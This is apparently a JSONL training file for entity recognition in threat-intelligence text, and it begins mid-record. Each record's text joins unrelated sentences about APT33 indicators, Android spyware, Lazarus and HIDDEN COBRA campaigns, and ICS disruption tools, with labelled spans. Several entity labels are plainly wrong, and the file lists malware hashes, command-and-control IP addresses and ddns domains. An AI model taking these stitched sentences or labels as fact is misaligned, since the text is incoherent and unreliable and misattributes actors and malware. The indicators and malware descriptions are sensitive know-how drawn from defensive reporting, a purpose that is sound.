None Enablement and usage of SQL extended stored procedures for Windows shell command execution : PIEHOP ( filename : r3_iec104_control.exe ) ( MD5 : cd8f394652db3d0376ba24a990403d20 ) is a disruption tool written in Python and packaged with PyInstaller version 2.1 + that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": [{"start": 579, "end": 610, "label": "Organization"}, {"start": 648, "end": 670, "label": "Malware"}, {"start": 708, "end": 713, "label": "Organization"}, {"start": 716, "end": 805, "label": "Malware"}, {"start": 813, "end": 903, "label": "Indicator"}, {"start": 906, "end": 912, "label": "System"}, {"start": 915, "end": 947, "label": "Indicator"}, {"start": 952, "end": 990, "label": "Indicator"}, {"start": 993, "end": 1206, "label": "Malware"}]} {"text": ". The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks . APT33 : a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2 AutoIt backdoor . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": [{"start": 6, "end": 30, "label": "Organization"}, {"start": 105, "end": 111, "label": "Organization"}, {"start": 129, "end": 134, "label": "Organization"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 145, "end": 232, "label": "Malware"}]} {"text": "Below is a fragment of such a log : Log with specified command Log files can be uploaded to the FTP server and sent to the attacker \u2019 s email inbox . Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets . APT33 : f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2 Gpppassword . 
In at least one instance , the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent .", "spans": [{"start": 150, "end": 157, "label": "Organization"}, {"start": 269, "end": 274, "label": "Organization"}, {"start": 277, "end": 360, "label": "Malware"}, {"start": 415, "end": 480, "label": "Malware"}]} {"text": "It \u2019 s even possible to send log messages via SMS to the attacker \u2019 s number . Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets . APT33 : 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2 LaZagne . We found roughly 500 domain names that lead or have led to the \u201c Pig network \u201d between 2015 to March 2017 .", "spans": [{"start": 79, "end": 90, "label": "Organization"}, {"start": 202, "end": 207, "label": "Organization"}, {"start": 210, "end": 289, "label": "Malware"}, {"start": 355, "end": 370, "label": "Organization"}]} {"text": "As the screenshot above shows , the malware has its own command syntax that represents a combination of characters while the \u201c # \u201d symbol is a delimiter . Feedback from our Smart Protection Network revealed that apart from attacks in North America ( mainly the U.S. ) , Europe , and South America , the campaign also noticeably affected enterprises in Taiwan , Hong Kong , China , and Bahrain . APT33 : 709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951 S-SHA2 LaZagne . 
CISA noted that threat actors ransomware tactics and techniques were continuing to evolve and become more technologically sophisticated with every passing month .", "spans": [{"start": 173, "end": 197, "label": "Organization"}, {"start": 337, "end": 348, "label": "Organization"}, {"start": 395, "end": 400, "label": "Organization"}, {"start": 403, "end": 482, "label": "Malware"}, {"start": 485, "end": 489, "label": "Organization"}, {"start": 501, "end": 514, "label": "Organization"}]} {"text": "A full list of all possible commands with descriptions can be found in Appendix II below . On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations . APT33 : a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2 Quasar RAT . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": [{"start": 112, "end": 118, "label": "Organization"}, {"start": 139, "end": 155, "label": "Organization"}, {"start": 156, "end": 168, "label": "Organization"}, {"start": 189, "end": 203, "label": "Organization"}, {"start": 208, "end": 231, "label": "Organization"}, {"start": 234, "end": 239, "label": "Organization"}, {"start": 242, "end": 324, "label": "Malware"}, {"start": 419, "end": 453, "label": "Malware"}]} {"text": "The malware has all the popular capabilities of modern spyware . On February 28 , the McAfee Advanced Threat Research team discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations . APT33 : 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2 Quasar RAT . 
These victims decrypted their files without accepting the ransom demands saving these individuals an estimated 1.5 billion .", "spans": [{"start": 86, "end": 117, "label": "Organization"}, {"start": 143, "end": 159, "label": "Organization"}, {"start": 160, "end": 172, "label": "Organization"}, {"start": 193, "end": 207, "label": "Organization"}, {"start": 212, "end": 235, "label": "Organization"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 246, "end": 328, "label": "Malware"}, {"start": 337, "end": 344, "label": "Organization"}]} {"text": "Below is a description of the most noteworthy : The implant is able to spy on all available device sensors and to log registered events . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . APT33 : d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2 Quasar RAT . The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below .", "spans": [{"start": 285, "end": 298, "label": "Vulnerability"}, {"start": 301, "end": 314, "label": "Vulnerability"}, {"start": 321, "end": 334, "label": "Vulnerability"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 345, "end": 427, "label": "Malware"}, {"start": 472, "end": 498, "label": "Organization"}]} {"text": "Moreover , there is a special handler for the accelerometer that is able to calculate and log the device \u2019 s speed : This feature is used in particular by the command \u201c tk0 \u201d that mutes the device , disables keyguard , turns off the brightness , uses wakelock and listens to device sensors . In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system . APT33 : ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2 Remcos . 
Neither France or Germany have been spared by the growing menace of ransomware , either .", "spans": [{"start": 337, "end": 349, "label": "Organization"}, {"start": 353, "end": 369, "label": "System"}, {"start": 422, "end": 427, "label": "Organization"}, {"start": 430, "end": 508, "label": "Malware"}, {"start": 579, "end": 589, "label": "Malware"}]} {"text": "This allows it to silently execute any backdoor activity without the user knowing that the device is in an active state . In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 . APT33 : e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2 Remcos . To hide their true location , the threat actor used the ExpressVPN service that showed connections to the web shell ( Notice.php ) on a compromised server coming from two IP addresses in London .", "spans": [{"start": 179, "end": 187, "label": "System"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 236, "end": 314, "label": "Malware"}, {"start": 351, "end": 363, "label": "Organization"}, {"start": 373, "end": 391, "label": "System"}, {"start": 423, "end": 447, "label": "System"}, {"start": 484, "end": 500, "label": "Indicator"}]} {"text": "As soon as the user picks up the device , the implant will detect a motion event and execute the \u201c tk1 \u201d and \u201c input keyevent 3 \u201d commands . This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT . APT33 : 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2 Remcos . 
The Twitter handle used by Hack520 indicates also an \u201c est \u201d portion .", "spans": [{"start": 183, "end": 195, "label": "Organization"}, {"start": 226, "end": 231, "label": "Organization"}, {"start": 234, "end": 312, "label": "Malware"}, {"start": 342, "end": 349, "label": "Organization"}]} {"text": "\u201c tk1 \u201d will disable all the effects of the \u201c tk0 \u201d command , while \u201c input keyevent 3 \u201d is the shell command that simulates the pressing of the \u2018 home \u2019 button so all the current activities will be minimized and the user won \u2019 t suspect anything . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . APT33 : 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2 Remcos . Most recently , the Ransomware and Financial Stability Act was introduced .", "spans": [{"start": 288, "end": 301, "label": "Vulnerability"}, {"start": 314, "end": 322, "label": "Organization"}, {"start": 370, "end": 375, "label": "Organization"}, {"start": 378, "end": 456, "label": "Malware"}]} {"text": "Location services to enable ( GPS/network ) tracking : The email command and control protocol . These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system . APT33 : ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2 Remcos . 
LIGHTWORK ( filename : OT_T855_IEC104_GR.exe ) ( MD5 : 7b6678a1c0000344f4faf975c0cfc43d ) is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 146, "end": 154, "label": "System"}, {"start": 192, "end": 200, "label": "Organization"}, {"start": 241, "end": 246, "label": "Organization"}, {"start": 249, "end": 327, "label": "Malware"}, {"start": 330, "end": 339, "label": "System"}, {"start": 342, "end": 374, "label": "Indicator"}, {"start": 379, "end": 417, "label": "Indicator"}]} {"text": "The implant can log in to the attackers email inbox , parse emails for commands in a special \u201c Cmd \u201d folder and save any payloads to a device from email attachments . Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants . APT33 : 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2 SniffPass . This enables GOGETTER to maintain persistence across reboots .", "spans": [{"start": 167, "end": 175, "label": "System"}, {"start": 202, "end": 233, "label": "Organization"}, {"start": 320, "end": 325, "label": "Organization"}, {"start": 328, "end": 409, "label": "Malware"}, {"start": 425, "end": 433, "label": "System"}]} {"text": "Accessing the \u201c Cmd \u201d folder in the attacker \u2019 s email box Moreover , it can send a specified file or all the gathered data from the victim device via email . We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) . APT33 : bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2 DarkComet . 
The compromise of a system that is within the bot net is simply used to facilitate another attack .", "spans": [{"start": 247, "end": 270, "label": "Organization"}, {"start": 316, "end": 321, "label": "Organization"}, {"start": 324, "end": 405, "label": "Malware"}, {"start": 428, "end": 434, "label": "Organization"}]} {"text": "Emergency SMS commands . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . APT33 : af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2 DarkComet . Checking the transcript log file created to see the full session .", "spans": [{"start": 25, "end": 34, "label": "Malware"}, {"start": 44, "end": 57, "label": "Vulnerability"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 151, "end": 232, "label": "Malware"}]} {"text": "If an incoming SMS contains one of the following magic strings : \u201d 2736428734\u2033 or \u201d 7238742800\u2033 the malware will execute multiple initial commands : Keylogger implementation Keylogging is implemented in an original manner . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) . APT33 : c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2 AutoIt FTP tool . 
Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": [{"start": 67, "end": 78, "label": "Indicator"}, {"start": 84, "end": 95, "label": "Indicator"}, {"start": 269, "end": 299, "label": "Malware"}, {"start": 318, "end": 338, "label": "System"}, {"start": 341, "end": 344, "label": "System"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 357, "end": 439, "label": "Malware"}, {"start": 447, "end": 456, "label": "Organization"}]} {"text": "Immediately after activation , the malware creates a textView element in a new window with the following layout parameters : All these parameters ensure the element is hidden from the user . This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data . APT33 : 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2 .NET FTP tool . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": [{"start": 235, "end": 253, "label": "Malware"}, {"start": 256, "end": 284, "label": "Malware"}, {"start": 287, "end": 305, "label": "Malware"}, {"start": 308, "end": 330, "label": "Malware"}, {"start": 333, "end": 355, "label": "Malware"}, {"start": 362, "end": 379, "label": "Malware"}, {"start": 382, "end": 387, "label": "Organization"}, {"start": 390, "end": 470, "label": "Malware"}]} {"text": "Then it adds onTouchListener to this textView and is able to process every user tap . Volgmer is a backdoor Trojan designed to provide covert access to a compromised system . APT33 : 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2 PowerShell downloader ( registry.ps1 ) . 
Ideology", "spans": [{"start": 86, "end": 93, "label": "System"}, {"start": 99, "end": 114, "label": "System"}, {"start": 127, "end": 148, "label": "Malware"}, {"start": 175, "end": 180, "label": "Organization"}, {"start": 183, "end": 276, "label": "Malware"}, {"start": 279, "end": 291, "label": "Malware"}]} {"text": "Interestingly , there is an allowlist of tapped activities : ui.ConversationActivity ui.ConversationListActivity SemcInCallScreen Quadrapop SocialPhonebookActivity The listener can operate with only coordinates , so it calculates pressed characters by matching given values with hardcoded ones : Additionally , if there is a predefined command , the keylogger can make a screenshot of the tapped display area : Manual access and operator menu There is a hidden menu ( Activity ) for controlling implant features that It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system . APT33 : dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2 POSHC2 backdoor . In late May , SentinelLabs observed a new Iranian statesponsored APT , which they dubbed Agrius , as conducting an extensive espionagedestruction campaign against Israeli targets since 2020 .", "spans": [{"start": 591, "end": 598, "label": "System"}, {"start": 622, "end": 641, "label": "Organization"}, {"start": 657, "end": 669, "label": "System"}, {"start": 740, "end": 745, "label": "Organization"}, {"start": 748, "end": 835, "label": "Malware"}, {"start": 852, "end": 864, "label": "Organization"}, {"start": 903, "end": 906, "label": "Organization"}, {"start": 927, "end": 933, "label": "Organization"}, {"start": 953, "end": 992, "label": "Organization"}, {"start": 1001, "end": 1016, "label": "Organization"}]} {"text": "looks like it was created for manual operator control . 
Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries . APT33 : 95.211.191.117 update-sec.com . We have observed some lower degrees of confidence overlaps in post - exploitation stages among these UNC groups , like using the same recon commands and utilities available on Windows .", "spans": [{"start": 78, "end": 97, "label": "Organization"}, {"start": 123, "end": 138, "label": "System"}, {"start": 165, "end": 175, "label": "Organization"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 190, "end": 200, "label": "Organization"}, {"start": 207, "end": 223, "label": "Organization"}, {"start": 226, "end": 231, "label": "Organization"}, {"start": 234, "end": 248, "label": "Indicator"}, {"start": 249, "end": 263, "label": "Indicator"}, {"start": 385, "end": 449, "label": "Indicator"}]} {"text": "To activate this menu the operator needs to call the hardcoded number \u201c 9909 \u201d from the infected device : A hidden menu then instantly appears on the device display : The operator can use this interface to type any command for execution . Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . APT33 : 8.26.21.120 mynetwork.ddns.net . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": [{"start": 282, "end": 302, "label": "System"}, {"start": 361, "end": 368, "label": "System"}, {"start": 371, "end": 376, "label": "Organization"}, {"start": 379, "end": 390, "label": "Indicator"}, {"start": 391, "end": 409, "label": "Indicator"}, {"start": 473, "end": 690, "label": "Malware"}]} {"text": "It also shows a current malware log . 
As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories . APT33 : 162.250.145.234 mynetwork.ddns.net . Money as a motivation may be the most frequent but also easiest to deal with of the four .", "spans": [{"start": 43, "end": 58, "label": "System"}, {"start": 61, "end": 68, "label": "System"}, {"start": 106, "end": 134, "label": "Malware"}, {"start": 137, "end": 167, "label": "Malware"}, {"start": 170, "end": 181, "label": "Malware"}, {"start": 186, "end": 201, "label": "Malware"}, {"start": 204, "end": 222, "label": "Malware"}, {"start": 225, "end": 246, "label": "Malware"}, {"start": 253, "end": 272, "label": "Malware"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 283, "end": 298, "label": "Indicator"}, {"start": 299, "end": 317, "label": "Indicator"}]} {"text": "Infrastructure FTP server The attackers used ftp : //213.174.157 [ . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . APT33 : 91.235.142.76 mywinnetwork.ddns.net . It supports loading arbitrary .NET assemblies encoded as Base64 sent to it via chat comments .", "spans": [{"start": 45, "end": 68, "label": "Indicator"}, {"start": 119, "end": 145, "label": "Organization"}, {"start": 155, "end": 172, "label": "Malware"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 197, "end": 210, "label": "Indicator"}, {"start": 211, "end": 232, "label": "Indicator"}]} {"text": "] 151/ as a command and control server . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll ) APT33 : 8.26.21.119 hyperservice.ddns.net . The U.S. 
government attributed the SolarWinds supply chain compromise which we track as UNC2452 to the Russian Foreign Intelligence Service ( SVR ) .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 140, "end": 144, "label": "Malware"}, {"start": 147, "end": 152, "label": "Organization"}, {"start": 155, "end": 166, "label": "Indicator"}, {"start": 167, "end": 188, "label": "Indicator"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 279, "end": 286, "label": "Organization"}, {"start": 294, "end": 338, "label": "Organization"}]} {"text": "The IP belongs to the free Russian web hosting service Ucoz . Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service . APT33 : 8.26.21.120 [REDACTED].ddns.net . The videos were quickly passed around offices while users \u2019 systems were silently infected in the background , and many of the APT \u2019s components were signed with phony Intel and AMD digital certificates .", "spans": [{"start": 62, "end": 76, "label": "Organization"}, {"start": 170, "end": 175, "label": "Organization"}, {"start": 178, "end": 189, "label": "Indicator"}, {"start": 190, "end": 209, "label": "Indicator"}]} {"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play.google.com/store/apps/details ? Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL . APT33 : 213.252.244.14 service-avant.com . 
Individuals who have access to critical information or systems can easily choose to misuse that accessto the detriment of their organization .", "spans": [{"start": 66, "end": 77, "label": "Indicator"}, {"start": 88, "end": 108, "label": "Indicator"}, {"start": 111, "end": 157, "label": "Indicator"}, {"start": 171, "end": 186, "label": "Organization"}, {"start": 198, "end": 201, "label": "Organization"}, {"start": 206, "end": 209, "label": "Organization"}, {"start": 221, "end": 235, "label": "System"}, {"start": 302, "end": 317, "label": "Organization"}, {"start": 331, "end": 336, "label": "Organization"}, {"start": 339, "end": 353, "label": "Indicator"}, {"start": 354, "end": 371, "label": "Indicator"}]} {"text": "id=eu.chainfire.supersu ) tool 246.us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP port 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications . APT33 : 91.235.142.124 mywinnetwork.ddns.net . 
If you can understand why a hacker hacks their motivations a little more clearly , along with who is most likely to be targeting your specific organization , you can bolster your defenses and be ready for whatever the threat landscape throws your way .", "spans": [{"start": 31, "end": 37, "label": "Indicator"}, {"start": 38, "end": 42, "label": "Indicator"}, {"start": 64, "end": 75, "label": "Indicator"}, {"start": 76, "end": 90, "label": "Indicator"}, {"start": 91, "end": 106, "label": "Indicator"}, {"start": 152, "end": 158, "label": "Indicator"}, {"start": 184, "end": 193, "label": "Indicator"}, {"start": 244, "end": 251, "label": "System"}, {"start": 279, "end": 289, "label": "Indicator"}, {"start": 310, "end": 337, "label": "Indicator"}, {"start": 359, "end": 383, "label": "Indicator"}, {"start": 384, "end": 388, "label": "Organization"}, {"start": 425, "end": 442, "label": "Indicator"}, {"start": 462, "end": 484, "label": "System"}, {"start": 488, "end": 494, "label": "System"}, {"start": 609, "end": 628, "label": "System"}, {"start": 631, "end": 634, "label": "System"}, {"start": 661, "end": 675, "label": "Organization"}, {"start": 678, "end": 683, "label": "Organization"}, {"start": 686, "end": 700, "label": "Indicator"}, {"start": 701, "end": 722, "label": "Indicator"}, {"start": 753, "end": 759, "label": "Organization"}]} {"text": "Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity . APT33 : 8.26.21.120 mynetwork.ddns.net . 
The ThreatConnect Platform centralizes threat intelligence , automates key activities and enables information sharing across the internal security organization and with external partners .", "spans": [{"start": 18, "end": 29, "label": "Indicator"}, {"start": 129, "end": 137, "label": "Indicator"}, {"start": 138, "end": 146, "label": "Indicator"}, {"start": 236, "end": 247, "label": "Indicator"}, {"start": 317, "end": 320, "label": "Organization"}, {"start": 325, "end": 328, "label": "Organization"}, {"start": 455, "end": 460, "label": "Organization"}, {"start": 463, "end": 474, "label": "Indicator"}, {"start": 475, "end": 493, "label": "Indicator"}, {"start": 500, "end": 522, "label": "System"}]} {"text": "Content of bdata.xml file : It can be added to the /system/etc/sysconfig/ path to allowlist specified implant components from the battery saving system . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal . APT33 : 162.250.145.234 mynetwork.ddns.net . When it comes to Cuba and similar threats , access to highfidelity threat intelligence to help identify the highest risk , most actively exploitable vulnerabilities can help prioritization efforts when organizations are faced with a backlog of vulnerabilities to address .", "spans": [{"start": 51, "end": 73, "label": "Indicator"}, {"start": 175, "end": 183, "label": "System"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 234, "end": 239, "label": "Organization"}, {"start": 242, "end": 257, "label": "Indicator"}, {"start": 258, "end": 276, "label": "Indicator"}, {"start": 296, "end": 300, "label": "Organization"}]} {"text": "Email account A Gmail account with password is mentioned in the sample \u2019 s code : It contains the victim \u2019 s exfiltrated data and \u201c cmd \u201d directory with commands for victim devices . 
We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL\u2013A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form\u2014a version that other researchers also recently identified . APT33 : 91.235.142.76 mywinnetwork.ddns.net . If the target system met predefined requirements , the malware used Twitter to look for specific tweets from pre - made accounts created by MiniDuke \u2019s command and control ( C2 ) operators , with specific tags labeling encrypted URLs for backdoors .", "spans": [{"start": 16, "end": 21, "label": "System"}, {"start": 201, "end": 209, "label": "System"}, {"start": 220, "end": 240, "label": "System"}, {"start": 283, "end": 300, "label": "System"}, {"start": 412, "end": 417, "label": "Organization"}, {"start": 420, "end": 433, "label": "Indicator"}, {"start": 434, "end": 455, "label": "Indicator"}]} {"text": "10 million Android phones infected by all-powerful auto-rooting apps First detected in November , Shedun/HummingBad infections are surging . Around 55% of the victims of Lazarus were located in India and neighboring countries . APT33 : 8.26.21.120 [REDACTED].ddns.net . 
Through this entry , in which we take a closer look at an individual who we believe might be connected to the Winnti group , we hope to give both ordinary users and organizations better insights into some of the tools \u2013 notably the server infrastructures- these kinds of threat actors use , as well as the scale in which they operate .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 98, "end": 115, "label": "Malware"}, {"start": 170, "end": 177, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 236, "end": 247, "label": "Indicator"}, {"start": 248, "end": 267, "label": "Indicator"}, {"start": 380, "end": 392, "label": "Organization"}, {"start": 416, "end": 430, "label": "Organization"}, {"start": 435, "end": 448, "label": "Organization"}, {"start": 482, "end": 487, "label": "System"}, {"start": 502, "end": 525, "label": "System"}, {"start": 541, "end": 554, "label": "Organization"}]} {"text": "7/7/2016 , 1:50 PM Security experts have documented a disturbing spike in a particularly virulent family of Android malware , with more than 10 million handsets infected and more than 286,000 of them in the US . Lazarus group could have been active since late 2016 , was used in a recent campaign targeting financial institutions using watering hole attacks . APT33 : 8.26.21.120 [REDACTED].ddns.net . 
A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": [{"start": 108, "end": 115, "label": "System"}, {"start": 212, "end": 225, "label": "Organization"}, {"start": 307, "end": 329, "label": "Organization"}, {"start": 360, "end": 365, "label": "Organization"}, {"start": 368, "end": 379, "label": "Indicator"}, {"start": 380, "end": 399, "label": "Indicator"}, {"start": 404, "end": 408, "label": "Organization"}]} {"text": "FURTHER READING New type of auto-rooting Android adware is nearly impossible to remove Researchers from security firm Check Point Software said the malware installs more than 50,000 fraudulent apps each day , displays 20 million malicious advertisements , and generates more than $ 300,000 per month in revenue . Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks\u2014such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank\u2014in recent history . APT33 : 95.211.191.117 update-sec.com . 
None DGA Formula The algorithm for generating domains has been updated and includes the TLDs toplevel domains of .space , .net , .dynu.net , and .top to evade detection of security vendors using the previously published DGA domain generation algorithm", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 118, "end": 138, "label": "Organization"}, {"start": 416, "end": 426, "label": "Organization"}, {"start": 435, "end": 448, "label": "Organization"}, {"start": 650, "end": 655, "label": "Organization"}, {"start": 658, "end": 672, "label": "Indicator"}, {"start": 673, "end": 687, "label": "Indicator"}, {"start": 695, "end": 706, "label": "Indicator"}, {"start": 778, "end": 839, "label": "Indicator"}]} {"text": "The success is largely the result of the malware 's ability to silently root a large percentage of the phones it infects by exploiting vulnerabilities that remain unfixed in older versions of Android . It 's possible that Lazarus is using RATANKBA to target larger organizations . APT33 : 5.187.21.70 microsoftupdated.com . 
On the left , the stolen credit card data is sent via a WebSocket skimmer while on the right , it is a POST request : In the past months there have been several Magecart skimmers abusing Google Tag Manager in one way or another .", "spans": [{"start": 135, "end": 199, "label": "Vulnerability"}, {"start": 222, "end": 229, "label": "Organization"}, {"start": 239, "end": 247, "label": "System"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 289, "end": 300, "label": "Indicator"}, {"start": 301, "end": 321, "label": "Indicator"}, {"start": 427, "end": 439, "label": "Indicator"}, {"start": 485, "end": 502, "label": "Malware"}, {"start": 511, "end": 529, "label": "System"}]} {"text": "The Check Point researchers have dubbed the malware family \" HummingBad , '' but researchers from mobile security company Lookout say HummingBad is in fact Shedun , a family of auto-rooting malware that came to light last November and had already infected a large number of devices . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . APT33 : 217.13.103.46 securityupdated.com . 
By comparison , the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 61, "end": 71, "label": "Malware"}, {"start": 122, "end": 129, "label": "Organization"}, {"start": 134, "end": 144, "label": "Malware"}, {"start": 156, "end": 162, "label": "Malware"}, {"start": 284, "end": 292, "label": "System"}, {"start": 321, "end": 354, "label": "Malware"}, {"start": 367, "end": 393, "label": "System"}, {"start": 406, "end": 415, "label": "System"}, {"start": 453, "end": 458, "label": "Organization"}, {"start": 461, "end": 474, "label": "Indicator"}, {"start": 475, "end": 494, "label": "Indicator"}, {"start": 517, "end": 531, "label": "Malware"}, {"start": 598, "end": 605, "label": "Malware"}, {"start": 657, "end": 668, "label": "Malware"}]} {"text": "Update Jul 11 2016 8:32 : On Monday , a Checkpoint representative disputed Lookout 's contention and pointed to this blog post from security firm Eleven Paths as support . Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses . APT33 : 8.26.21.120 [REDACTED].ddns.net . 
The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname \u201c PIG GOD\u201d\u2014another", "spans": [{"start": 40, "end": 50, "label": "Organization"}, {"start": 75, "end": 82, "label": "Organization"}, {"start": 146, "end": 158, "label": "Organization"}, {"start": 246, "end": 253, "label": "Organization"}, {"start": 272, "end": 278, "label": "Organization"}, {"start": 295, "end": 309, "label": "Organization"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 388, "end": 399, "label": "Indicator"}, {"start": 400, "end": 419, "label": "Indicator"}, {"start": 422, "end": 540, "label": "Indicator"}]} {"text": "The blog post said HummingBad \" uses a completely different infrastructure with little in common '' with Shedun . simultaneous use of the detected Win32/KillDisk.NBO variants . APT33 : 5.187.21.71 backupnet.ddns.net . In some instances , two randomly generated bytes are added to the end of the file , which invalidates the detection of the dropped files using simple checksum - based techniques .", "spans": [{"start": 19, "end": 29, "label": "Malware"}, {"start": 147, "end": 165, "label": "System"}, {"start": 177, "end": 182, "label": "Organization"}, {"start": 185, "end": 196, "label": "Indicator"}, {"start": 197, "end": 215, "label": "Indicator"}, {"start": 368, "end": 395, "label": "System"}]} {"text": "In an e-mail , a Lookout representative stood by its analysis and said company researchers planned to publish an in-depth response in the coming days . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government \u2013 commonly known as HARDRAIN . APT33 : 91.230.121.143 backupnet.ddns.net . 
